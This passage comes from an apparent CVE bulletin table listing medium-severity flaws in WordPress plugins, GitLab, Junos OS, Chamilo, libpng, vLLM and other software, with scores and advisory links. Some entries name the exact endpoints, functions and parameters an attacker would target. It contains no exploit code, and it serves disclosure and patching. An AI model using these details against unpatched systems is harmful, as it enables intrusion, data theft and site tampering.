https://plugins.trac.wordpress.org/browser/wp-blockade/tags/0.9.14/wp-blockade.php#L361 https://plugins.trac.wordpress.org/browser/wp-blockade/trunk/wp-blockade.php#L112 https://plugins.trac.wordpress.org/browser/wp-blockade/tags/0.9.14/wp-blockade.php#L112 |
| David Lingren--Media LIbrary Assistant | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in David Lingren Media LIbrary Assistant allows Stored XSS.This issue affects Media LIbrary Assistant: from n/a through 3.34. | 2026-04-06 | 6.5 | CVE-2026-34897 | https://patchstack.com/database/wordpress/plugin/media-library-assistant/vulnerability/wordpress-media-library-assistant-plugin-3-34-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Red Hat--mirror registry for Red Hat OpenShift | A flaw was found in the OpenShift Mirror Registry. This vulnerability allows an unauthenticated, remote attacker to enumerate valid usernames and email addresses via different error messages during authentication failures and account creation. | 2026-04-08 | 5.3 | CVE-2025-14243 | https://access.redhat.com/security/cve/CVE-2025-14243 RHBZ#2419829 |
| inisev--BackupBliss Backup & Migration with Free Cloud Storage | The Backup Migration plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 2.0.0. This is due to a missing capability check on the 'initializeOfflineAjax' function and lack of proper nonce verification. The endpoint only validates against hardcoded tokens which are publicly exposed in the plugin's JavaScript. This makes it possible for unauthenticated attackers to trigger the backup upload queue processing, potentially causing unexpected backup transfers to configured cloud storage targets and resource exhaustion. | 2026-04-07 | 5.3 | CVE-2025-14944 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a2a41a15-0743-48cc-8c92-7cb839fa5847?source=cve https://plugins.trac.wordpress.org/browser/backup-backup/trunk/includes/offline.php#L29 https://plugins.trac.wordpress.org/browser/backup-backup/trunk/includes/ajax_offline.php#L112 https://plugins.trac.wordpress.org/changeset?old=3386897&old_path=backup-backup%2Ftags%2F2.0.0%2Fincludes%2Foffline.php&new=3449635&new_path=backup-backup%2Ftags%2F2.1.0%2Fincludes%2Foffline.php |
| johanaarstein--AM LottiePlayer | The AM LottiePlayer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via uploaded SVG files in all versions up to, and including, 3.6.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-04-08 | 5.4 | CVE-2025-1794 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ef2f1ad1-1e2e-4b56-b16c-d87956b142ad?source=cve https://plugins.trac.wordpress.org/browser/am-lottieplayer/tags/3.5.0/includes/upload-thumbnail.php |
| Hitachi--JP1/IT Desktop Management 2 - Manager | Buffer Overflow Vulnerability in JP1/IT Desktop Management 2 - Manager on Windows, JP1/IT Desktop Management 2 - Operations Director on Windows, Job Management Partner 1/IT Desktop Management 2 - Manager on Windows, JP1/IT Desktop Management - Manager on Windows, Job Management Partner 1/IT Desktop Management - Manager on Windows, JP1/NETM/DM Manager on Windows, JP1/NETM/DM Client on Windows, Job Management Partner 1/Software Distribution Manager on Windows, Job Management Partner 1/Software Distribution Client on Windows.This issue affects JP1/IT Desktop Management 2 - Manager: from 13-50 before 13-50-02, from 13-11 before 13-11-04, from 13-10 before 13-10-07, from 13-01 before 13-01-07, from 13-00 before 13-00-05, from 12-60 before 12-60-12, from 10-50 through 12-50-11; JP1/IT Desktop Management 2 - Operations Director: from 13-50 before 13-50-02, from 13-11 before 13-11-04, from 13-10 before 13-10-07, from 13-01 before 13-01-07, from 13-00 before 13-00-05, from 12-60 before 12-60-12, from 10-50 through 12-50-11; Job Management Partner 1/IT Desktop Management 2 - Manager: from 10-50 through 10-50-11; JP1/IT Desktop Management - Manager: from 09-50 through 10-10-16; Job Management Partner 1/IT Desktop Management - Manager: from 09-50 through 10-10-16; JP1/NETM/DM Manager: from 09-00 through 10-20-02; JP1/NETM/DM Client: from 09-00 through 10-20-02; Job Management Partner 1/Software Distribution Manager: from 09-00 through 09-51-13; Job Management Partner 1/Software Distribution Client: from 09-00 through 09-51-13. | 2026-04-07 | 5.5 | CVE-2025-65116 | https://www.hitachi.com/products/it/software/security/info/vuls/hitachi-sec-2026-118/index.html |
| vsourz1td--Advanced Contact form 7 DB | The Advanced Contact form 7 DB plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.9. This is due to missing or incorrect nonce validation on the 'vsz_cf7_save_setting_callback' function. This makes it possible for unauthenticated attackers to delete form entry via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-04-08 | 5.4 | CVE-2026-0811 | https://www.wordfence.com/threat-intel/vulnerabilities/id/88097744-d2f5-4ae5-aa71-0f4a0decd911?source=cve https://plugins.trac.wordpress.org/browser/advanced-cf7-db/tags/2.0.9/admin/class-advanced-cf7-db-admin.php#L885 https://plugins.trac.wordpress.org/changeset/3497481/advanced-cf7-db |
| GitLab--GitLab | GitLab has remediated an issue in GitLab EE affecting all versions from 18.0.0 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that in Code Quality reports could have allowed an authenticated user to leak IP addresses of users viewing the report via specially crafted content. | 2026-04-08 | 5.7 | CVE-2026-1516 | HackerOne Bug Bounty Report #3514461 https://gitlab.com/gitlab-org/gitlab/-/work_items/587893 https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/ |
| wpmudev--Hustle Email Marketing, Lead Generation, Optins, Popups | The Hustle - Email Marketing, Lead Generation, Optins, Popups plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'hustle_module_converted' AJAX action in all versions up to, and including, 7.8.10.2. This makes it possible for unauthenticated attackers to forge conversion tracking events for any Hustle module, including draft modules that are never displayed to users, thereby manipulating marketing analytics and conversion statistics. | 2026-04-07 | 5.3 | CVE-2026-2263 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2305462c-0a00-4423-8dc2-e32628c4864d?source=cve https://plugins.trac.wordpress.org/browser/wordpress-popup/tags/7.8.9.3/inc/front/hustle-module-front-ajax.php#L32 https://plugins.trac.wordpress.org/browser/wordpress-popup/tags/7.8.9.3/inc/front/hustle-module-front-ajax.php#L1047 https://plugins.trac.wordpress.org/browser/wordpress-popup/tags/7.8.9.3/inc/front/hustle-module-front.php#L311 https://plugins.trac.wordpress.org/changeset?old_path=/wordpress-popup/tags/7.8.10.2&new_path=/wordpress-popup/tags/7.8.11 |
| OCS Inventory--OCS Inventory NG Server | OCS Inventory NG Server version 2.12.3 and prior contain a stored cross-site scripting vulnerability that allows unauthenticated attackers to execute arbitrary JavaScript by submitting malicious User-Agent HTTP headers to the /ocsinventory endpoint. Attackers can register rogue agents or craft requests with malicious User-Agent values that are stored without sanitation and rendered with insufficient encoding in the web console, leading to arbitrary JavaScript execution in the browsers of authenticated users viewing the statistics dashboard. | 2026-04-06 | 5.4 | CVE-2026-22675 | https://github.com/OCSInventory-NG/OCSInventory-Server/pull/483 https://github.com/OCSInventory-NG/OCSInventory-Server/commit/78faf2ca8b897141ba4d337d75692ab8e405bd4e https://www.vulncheck.com/advisories/ocs-inventory-ng-server-stored-xss-via-user-agent |
| Volcengine--OpenViking | OpenViking versions prior to 0.3.3 contain a missing authorization vulnerability in the task polling endpoints that allows unauthorized attackers to enumerate or retrieve background task metadata created by other users. Attackers can access the /api/v1/tasks and /api/v1/tasks/{task_id} routes without authentication to expose task type, task status, resource identifiers, archive URIs, result payloads, and error information, potentially causing cross-tenant interference in multi-tenant deployments. | 2026-04-07 | 5.3 | CVE-2026-22680 | https://github.com/volcengine/OpenViking/releases/tag/v0.3.3 https://github.com/volcengine/OpenViking/pull/1182 https://github.com/volcengine/OpenViking/commit/8c1c3f3608364ee0bb0e45f73478771a68aebdf5 https://www.vulncheck.com/advisories/openviking-missing-authorization-via-task-polling |
| HDFGroup--hdf5 | HDF5 is software for managing data. In 1.14.1-2 and earlier, an attacker who can control an h5 file parsed by HDF5 can trigger a write-based heap buffer overflow condition in the H5T__ref_mem_setnull method. This can lead to a denial-of-service condition, and potentially further issues such as remote code execution depending on the practical exploitability of the heap overflow against modern operating systems. | 2026-04-10 | 5.5 | CVE-2026-29043 | https://github.com/HDFGroup/hdf5/security/advisories/GHSA-qm2m-5g5w-2277 |
| smub--Charitable Donation Plugin for WordPress Fundraising with Recurring Donations & More | The Charitable - Donation Plugin for WordPress - Fundraising with Recurring Donations & More plugin for WordPress is vulnerable to Insufficient Verification of Data Authenticity in versions up to, and including, 1.8.9.7. This is due to missing cryptographic verification of incoming Stripe webhook events. This makes it possible for unauthenticated attackers to forge payment_intent.succeeded webhook payloads and mark pending donations as completed without a real payment. | 2026-04-07 | 5.3 | CVE-2026-3177 | https://www.wordfence.com/threat-intel/vulnerabilities/id/bc3b2645-7b57-4884-99c5-e37dbd4a9600?source=cve https://plugins.trac.wordpress.org/changeset/3485023/charitable |
| Red Hat--mirror registry for Red Hat OpenShift | A flaw was found in Red Hat Quay's Proxy Cache configuration feature. When an organization administrator configures an upstream registry for proxy caching, Quay makes a network connection to the specified registry hostname without verifying that it points to a legitimate external service. An attacker with organization administrator privileges could supply a crafted hostname to force the Quay server to make requests to internal network services, cloud infrastructure endpoints, or other resources that should not be accessible from the Quay application. | 2026-04-08 | 5.2 | CVE-2026-32591 | https://access.redhat.com/security/cve/CVE-2026-32591 RHBZ#2446965 |
| opensourcepos--opensourcepos | Open Source Point of Sale is a web based point-of-sale application written in PHP using CodeIgniter framework. Prior to 3.4.3, a Stored Cross-Site Scripting (XSS) vulnerability exists in the Daily Sales management table. The customer_name column is configured with escape: false in the bootstrap-table column configuration, causing customer names to be rendered as raw HTML. An attacker with customer management permissions can inject arbitrary JavaScript into a customer's first_name or last_name field, which executes in the browser of any user viewing the Daily Sales page. This vulnerability is fixed in 3.4.3. | 2026-04-07 | 5.4 | CVE-2026-32712 | https://github.com/opensourcepos/opensourcepos/security/advisories/GHSA-hcfr-9hfv-mcwp |
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 2.0.0-RC.3, a Reflected Cross-Site Scripting (XSS) vulnerability in the exercise question list admin panel allows an attacker to execute arbitrary JavaScript in an authenticated teacher's browser. The pagination code merges all $_GET parameters via array_merge() and outputs the result via http_build_query() directly into HTML href attributes without htmlspecialchars() encoding. This vulnerability is fixed in 2.0.0-RC.3. | 2026-04-10 | 5.4 | CVE-2026-32893 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-37jh-g64j-88mc https://github.com/chamilo/chamilo-lms/commit/72bc403f89b1ebb73a139f8f6cf0478857592276 |
| Microsoft--Microsoft Edge for Android | User interface (ui) misrepresentation of critical information in Microsoft Edge (Chromium-based) allows an unauthorized attacker to perform spoofing over a network. | 2026-04-10 | 5.4 | CVE-2026-33119 | Microsoft Edge (Chromium-based) for Android Spoofing Vulnerability |
| pi-hole--web | Pi-hole Admin Interface is a web interface for managing Pi-hole, a network-level ad and internet tracker blocking application. From 6.0 to before 6.5, configuration values from the /api/config endpoint are placed directly into HTML value="" attributes without escaping in settings-advanced.js, enabling HTML attribute injection. A double quote in any config value breaks out of the attribute context. JavaScript execution is blocked by the server's CSP (script-src 'self'), but injected attributes can alter element styling for UI redressing. The primary attack vector is importing a malicious teleporter backup, which bypasses per-field server-side validation. This vulnerability is fixed in 6.5. | 2026-04-06 | 5.4 | CVE-2026-33406 | https://github.com/pi-hole/web/security/advisories/GHSA-9rfm-c5g6-538p |
| themeum--Tutor LMS eLearning and online course solution | The Tutor LMS - eLearning and online course solution plugin for WordPress is vulnerable to unauthorized private course enrollment in all versions up to, and including, 3.9.7. This is due to missing post_status validation in the `enroll_now()` and `course_enrollment()` functions. Both enrollment endpoints verify the nonce, user authentication, and whether the course is purchasable, but fail to check if the course has a `private` post_status. This makes it possible for authenticated attackers with Subscriber-level access or above to enroll in private courses by sending a crafted POST request with the target course ID. The enrollment record is created in the database and the private course title and enrollment status are exposed in the subscriber's dashboard, though WordPress core access control prevents the subscriber from viewing the actual course content (returns 404). Enrollment in private courses should be restricted to users with the `read_private_posts` capability. | 2026-04-11 | 5.4 | CVE-2026-3358 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0c173356-7228-4253-bb28-2c2e11af76fd?source=cve https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Course.php#L2066 https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Course.php#L134 https://plugins.trac.wordpress.org/browser/tutor/trunk/classes/Course.php#L2053 https://plugins.trac.wordpress.org/browser/tutor/trunk/classes/Course.php#L2989 https://plugins.trac.wordpress.org/changeset?old_path=%2Ftutor/tags/3.9.7&new_path=%2Ftutor/tags/3.9.8 https://plugins.trac.wordpress.org/changeset/3496394/tutor/trunk/classes/Course.php |
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 1.11.38, Twig template files (.tpl) under /main/template/default/ are directly accessible without authentication via HTTP GET requests. These templates expose internal application logic, variable names, AJAX endpoint URLs, and admin panel structure. This vulnerability is fixed in 1.11.38. | 2026-04-10 | 5.3 | CVE-2026-33705 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-5wjg-8x28-px57 https://github.com/chamilo/chamilo-lms/commit/4efb5ee8ed849ca147ca1fe7472ef7b98db17bff |
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, multiple files use simplexml_load_string() without XXE protection. With LIBXML_NOENT flag, arbitrary server files can be read. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3. | 2026-04-10 | 5.3 | CVE-2026-33737 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-c4ww-qgf2-v89j https://github.com/chamilo/chamilo-lms/commit/22b1cb1c609b643765c88654155aba27070c927e https://github.com/chamilo/chamilo-lms/commit/af6b7002af7c15825e98fc522e2ead0d00cacaa3 |
| Juniper Networks--Junos OS | An Incorrect Initialization of Resource vulnerability in the packet forwarding engine (pfe) of Juniper Networks Junos OS on specific EX Series and QFX Series device allows an unauthenticated, network-based attacker to cause an integrity impact to downstream networks. When the same family inet or inet6 filter is applied on an IRB interface and on a physical interface as egress filter on EX4100, EX4400, EX4650 and QFX5120 devices, only one of the two filters will be applied, which can lead to traffic being sent out one of these interfaces which should have been blocked. This issue affects Junos OS on EX Series and QFX Series: * 23.4 version 23.4R2-S6, * 24.2 version 24.2R2-S3. No other Junos OS versions are affected. | 2026-04-09 | 5.8 | CVE-2026-33773 | https://kb.juniper.net/JSA107815 |
| Juniper Networks--Junos OS | A Missing Authorization vulnerability in the CLI of Juniper Networks Junos OS and Junos OS Evolved allows a local user with low privileges to read sensitive information. A local user with low privileges can execute the CLI command 'show mgd' with specific arguments which will expose sensitive information. This issue affects Junos OS: * all versions before 22.4R3-S8, * 23.2 versions before 23.2R2-S6, * 23.4 versions before 23.4R2-S6, * 24.2 versions before 24.2R2-S4, * 24.4 versions before 24.4R2-S1, * 25.2 version before 25.2R1-S2, 25.2R2; Junos OS Evolved: * all versions before 23.2R2-S6-EVO, * 23.4 version before 23.4R2-S6-EVO, * 24.2 version before 24.2R2-S4-EVO, * 24.4 versions before 24.4R2-S1-EVO, * 25.2 versions before 25.2R2-EVO. | 2026-04-09 | 5.5 | CVE-2026-33776 | https://kb.juniper.net/JSA107866 |
| Juniper Networks--Junos OS | An Improper Check for Unusual or Exceptional Conditions vulnerability in the chassis control daemon (chassisd) of Juniper Networks Junos OS on SRX1600, SRX2300 and SRX4300 allows a local attacker with low privileges to cause a complete Denial of Service (DoS). When a specific 'show chassis' CLI command is executed, chassisd crashes and restarts which causes a momentary impact to all traffic until all modules are online again. This issue affects Junos OS on SRX1600, SRX2300 and SRX4300: * 24.4 versions before 24.4R1-S3, 24.4R2. This issue does not affect Junos OS versions before 24.4R1. | 2026-04-09 | 5.5 | CVE-2026-33786 | https://kb.juniper.net/JSA107810 |
| Juniper Networks--Junos OS | An Improper Check for Unusual or Exceptional Conditions vulnerability in the chassis control daemon (chassisd) of Juniper Networks Junos OS on SRX1500, SRX4100, SRX4200 and SRX4600 allows a local attacker with low privileges to cause a complete Denial of Service (DoS). When a specific 'show chassis' CLI command is executed, chassisd crashes and restarts which causes a momentary impact to all traffic until all modules are online again. This issue affects Junos OS on SRX1500, SRX4100, SRX4200 and SRX4600: * 23.2 versions before 23.2R2-S6, * 23.4 versions before 23.4R2-S7 * 24.2 versions before 24.2R2-S2, * 24.4 versions before 24.4R2, * 25.2 versions before 25.2R1-S1, 25.2R2. | 2026-04-09 | 5.5 | CVE-2026-33787 | https://kb.juniper.net/JSA107873 |
| AcademySoftwareFoundation--openexr | OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. From 3.2.0 to before 3.2.7, 3.3.9, and 3.4.9, a signed integer overflow exists in undo_pxr24_impl() in src/lib/OpenEXRCore/internal_pxr24.c at line 377. The expression (uint64_t)(w * 3) computes w * 3 as a signed 32-bit integer before casting to uint64_t. When w is large, this multiplication constitutes undefined behavior under the C standard. On tested builds (clang/gcc without sanitizers), two's-complement wraparound commonly occurs, and for specific values of w the wrapped result is a small positive integer, which may allow the subsequent bounds check to pass incorrectly. If the check is bypassed, the decoding loop proceeds to write pixel data through dout, potentially extending far beyond the allocated output buffer. This vulnerability is fixed in 3.2.7, 3.3.9, and 3.4.9. | 2026-04-06 | 5.9 | CVE-2026-34380 | https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-q3v8-hw4m-59w5 https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.2.7 https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.3.9 https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.4.9 |
| vllm-project--vllm | vLLM is an inference and serving engine for large language models (LLMs). From 0.16.0 to before 0.19.0, a server-side request forgery (SSRF) vulnerability in download_bytes_from_url allows any actor who can control batch input JSON to make the vLLM batch runner issue arbitrary HTTP/HTTPS requests from the server, without any URL validation or domain restrictions. This can be used to target internal services (e.g. cloud metadata endpoints or internal HTTP APIs) reachable from the vLLM host. This vulnerability is fixed in 0.19.0. | 2026-04-06 | 5.4 | CVE-2026-34753 | https://github.com/vllm-project/vllm/security/advisories/GHSA-pf3h-qjgv-vcpr |
| pnggroup--libpng | LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From 1.0.9 to before 1.6.57, passing a pointer obtained from png_get_PLTE, png_get_tRNS, or png_get_hIST back into the corresponding setter on the same png_struct/png_info pair causes the setter to read from freed memory and copy its contents into the replacement buffer. The setter frees the internal buffer before copying from the caller-supplied pointer, which now dangles. The freed region may contain stale data (producing silently corrupted chunk metadata) or data from subsequent heap allocations (leaking unrelated heap contents into the chunk struct). This vulnerability is fixed in 1.6.57. | 2026-04-09 | 5.1 | CVE-2026-34757 | https://github.com/pnggroup/libpng/security/advisories/GHSA-6fr7-g8h7-v645 https://github.com/pnggroup/libpng/issues/836 https://github.com/pnggroup/libpng/issues/837 https://github.com/pnggroup/libpng/commit/398cbe3df03f4e11bb031e07f416dfdde3684e8a https://github.com/pnggroup/libpng/commit/55d20aaa322c9274491cda82c5cd4f99b48c6bcc |
| projectzealous01--PZ Frontend Manager | The PZ Frontend Manager plugin for WordPress is vulnerable to Missing Authorization in all versions up to and including 1.0.6. The pzfm_user_request_action_callback() function, registered via the wp_ajax_pzfm_user_request_action action hook, lacks both capability checks and nonce verification. This function handles user activation, deactivation, and deletion operations. When the 'dataType' parameter is set to 'delete', the function calls wp_delete_user() on all provided user IDs without verifying that the current user has the appropriate permissions. Notably, the similar pzfm_remove_item_callback() function does check pzfm_can_delete_user() before performing deletions, indicating this was an oversight. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary WordPress users (including administrators) by sending a crafted request to the AJAX endpoint. | 2026-04-08 | 5.3 | CVE-2026-3477 | https://www.wordfence.com/threat-intel/vulnerabilities/id/90d8e345-b549-493b-a84b-abe56ab42a04?source=cve https://plugins.trac.wordpress.org/browser/pz-frontend-manager/trunk/admin/includes/ajax-hooks.php#L331 https://plugins.trac.wordpress.org/browser/pz-frontend-manager/tags/1.0.6/admin/includes/ajax-hooks.php#L331 https://plugins.trac.wordpress.org/browser/pz-frontend-manager/trunk/admin/includes/ajax-hooks.php#L292 https://plugins.trac.wordpress.org/browser/pz-frontend-manager/tags/1.0.6/admin/includes/ajax-hooks.php#L292 https://plugins.trac.wordpress.org/browser/pz-frontend-manager/trunk/admin/includes/ajax-hooks.php#L290 https://plugins.trac.wordpress.org/browser/pz-frontend-manager/tags/1.0.6/admin/includes/ajax-hooks.php#L290 |
| Eniture technology--LTL Freight Quotes Worldwide Express Edition | Missing Authorization vulnerability in Eniture technology LTL Freight Quotes - Worldwide Express Edition allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects LTL Freight Quotes - Worldwide Express Edition: from n/a through 5.2.1. | 2026-04-07 | 5.3 | CVE-2026-34899 | https://patchstack.com/database/wordpress/plugin/ltl-freight-quotes-worldwide-express-edition/vulnerability/wordpress-ltl-freight-quotes-worldwide-express-edition-plugin-5-2-1-broken-access-control-vulnerability?_s_id=cve |
| OceanWP--Ocean Extra | Missing Authorization vulnerability in OceanWP Ocean Extra allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Ocean Extra: from n/a through 2.5.3. | 2026-04-07 | 5.4 | CVE-2026-34903 | https://patchstack.com/database/wordpress/plugin/ocean-extra/vulnerability/wordpress-ocean-extra-plugin-2-5-3-broken-access-control-vulnerability?_s_id=cve |
| Heatmiser--Heatmiser Wifi Thermostat | Heatmiser Wifi Thermostat 1.7 contains a cross-site request forgery vulnerability that allows attackers to change administrator credentials by tricking authenticated users into submitting malicious requests. Attackers can craft HTML forms targeting the networkSetup.htm endpoint with parameters usnm, usps, and cfps to modify the admin username and password without user consent. | 2026-04-12 | 4.3 | CVE-2019-25708 | ExploitDB-46100 VulnCheck Advisory: Heatmiser Wifi Thermostat 1.7 Cross-Site Request Forgery |
| GitLab--GitLab | GitLab has remediated an issue in GitLab EE affecting all versions from 16.6 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that under certain circumstances could have allowed an authenticated user to have access to other users' email addresses via certain GraphQL queries. | 2026-04-08 | 4.3 | CVE-2025-9484 | GitLab Issue #565363 HackerOne Bug Bounty Report #3303810 https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/ |
| vsourz1td--Advanced Contact form 7 DB | The Advanced Contact form 7 DB plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'vsz_cf7_export_to_excel' function in all versions up to, and including, 2.0.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to export form submissions to excel file. | 2026-04-08 | 4.3 | CVE-2026-0814 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5e3de1a4-a534-475b-9138-2337755b0288?source=cve https://plugins.trac.wordpress.org/browser/advanced-cf7-db/tags/2.0.9/admin/class-advanced-cf7-db-admin.php#L1507 https://plugins.trac.wordpress.org/changeset/3497481/advanced-cf7-db |
| realmag777--BEAR Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net | The BEAR - Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.5. This is due to missing nonce validation on the woobe_delete_tax_term() function. This makes it possible for unauthenticated attackers to delete WooCommerce taxonomy terms (categories, tags, etc.) via a forged request granted they can trick a site administrator or shop manager into performing an action such as clicking on a link. | 2026-04-08 | 4.3 | CVE-2026-1673 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1e4e8960-b0c1-4dbb-ba97-e45b88fb06c0?source=cve https://plugins.trac.wordpress.org/browser/woo-bulk-editor/trunk/index.php#L1474 https://plugins.trac.wordpress.org/changeset/3457263/ https://plugins.trac.wordpress.org/changeset/3465138/ |
| GitLab--GitLab | GitLab has remediated an issue in GitLab EE affecting all versions from 11.3 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an authenticated user with developer-role permissions to modify protected environment settings due to improper authorization checks in the API. | 2026-04-08 | 4.3 | CVE-2026-1752 | HackerOne Bug Bounty Report #3533545 https://gitlab.com/gitlab-org/gitlab/-/work_items/588413 https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/ |
| arubadev--Aruba HiSpeed Cache | The Aruba HiSpeed Cache plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.0.4. This is due to missing nonce verification on the `ahsc_ajax_reset_options()` function. This makes it possible for unauthenticated attackers to reset all plugin settings to their default values via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-04-10 | 4.3 | CVE-2026-1924 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d2230151-fde2-43d6-8bff-0d2ffd559ab3?source=cve https://plugins.trac.wordpress.org/browser/aruba-hispeed-cache/tags/3.0.4/aruba-hispeed-cache.php#L632 https://plugins.trac.wordpress.org/browser/aruba-hispeed-cache/tags/3.0.4/aruba-hispeed-cache.php#L631 https://plugins.trac.wordpress.org/changeset?old_path=%2Faruba-hispeed-cache/tags/3.0.4&new_path=%2Faruba-hispeed-cache/tags/3.0.5 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.2 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an authenticated user to access confidential issues assigned to other users via CSV export due to insufficient authorization checks. | 2026-04-08 | 4.3 | CVE-2026-2104 | HackerOne Bug Bounty Report #3541476 https://gitlab.com/gitlab-org/gitlab/-/work_items/589021 https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/ |
| idealwebdesignlk--Whole Enquiry Cart for WooCommerce | The Whole Enquiry Cart for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'woowhole_success_msg' parameter in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-04-08 | 4.4 | CVE-2026-2838 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ddc14a98-1df8-480b-bae3-5ec057b498af?source=cve https://plugins.trac.wordpress.org/browser/whole-cart-enquiry/trunk/admin.php#L53 |
| homarr-labs--homarr | Homarr is an open-source dashboard. Prior to 1.57.0, the user registration endpoint (/api/trpc/user.register) is vulnerable to a race condition that allows an attacker to create multiple user accounts from a single-use invite token. The registration flow performs three sequential database operations without a transaction: CHECK, CREATE, and DELETE. Because these operations are not atomic, concurrent requests can all pass the validation step (1) before any of them reaches the deletion step (3). This allows multiple accounts to be registered using a single invite token that was intended to be single-use. This vulnerability is fixed in 1.57.0. | 2026-04-06 | 4.2 | CVE-2026-32602 | https://github.com/homarr-labs/homarr/security/advisories/GHSA-vfw3-53q9-2hp8 |
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, an Open Redirect vulnerability in the session course edit page allows an attacker to redirect an authenticated administrator to an arbitrary external URL after saving coach assignment changes. The redirect also leaks the id_session parameter to the attacker's server. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3. | 2026-04-10 | 4.7 | CVE-2026-32932 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-q2cp-3qj3-wx8q https://github.com/chamilo/chamilo-lms/commit/b005b3d3e76cf6eafc03e15ac445ceff089551c0 https://github.com/chamilo/chamilo-lms/commit/fbd8d7eb37d05ec974293f05b6ffaaf9102ebd2b |
| Microsoft--Microsoft Edge (Chromium-based) | Microsoft Edge (Chromium-based) Spoofing Vulnerability | 2026-04-10 | 4.3 | CVE-2026-33118 | Microsoft Edge (Chromium-based) Spoofing Vulnerability |
| Elastic--Kibana | Incorrect Authorization (CWE-863) in Kibana can lead to cross-space information disclosure via Privilege Abuse (CAPEC-122). A user with Fleet agent management privileges in one Kibana space can retrieve Fleet Server policy details from other spaces through an internal enrollment endpoint. The endpoint bypasses space-scoped access controls by using an unscoped internal client, returning operational identifiers, policy names, management state, and infrastructure linkage details from spaces the user is not authorized to access. | 2026-04-08 | 4.3 | CVE-2026-33460 | https://discuss.elastic.co/t/kibana-8-19-14-9-2-8-9-3-3-security-update-esa-2026-25/385813 |
| themeum--Tutor LMS eLearning and online course solution | The Tutor LMS - eLearning and online course solution plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 3.9.7. This is due to missing authorization checks in the `save_course_content_order()` private method, which is called unconditionally by the `tutor_update_course_content_order` AJAX handler. While the handler's `content_parent` branch includes a `can_user_manage()` check, the `save_course_content_order()` call processes attacker-supplied `tutor_topics_lessons_sorting` JSON without any ownership or capability verification. This makes it possible for authenticated attackers with Subscriber-level access or above to detach lessons from topics, reorder course content, and reassign lessons between topics in any course, including admin-owned courses, by sending a crafted AJAX request with manipulated topic and lesson IDs. | 2026-04-11 | 4.3 | CVE-2026-3371 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f9cf0430-8577-449a-aefe-d7bf606fe2de?source=cve https://plugins.trac.wordpress.org/browser/tutor/trunk/classes/Course.php#L1687 https://plugins.trac.wordpress.org/browser/tutor/trunk/classes/Course.php#L1755 https://plugins.trac.wordpress.org/browser/tutor/trunk/classes/Course.php#L252 https://plugins.trac.wordpress.org/changeset?old_path=%2Ftutor/tags/3.9.7&new_path=%2Ftutor/tags/3.9.8 |
Low Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
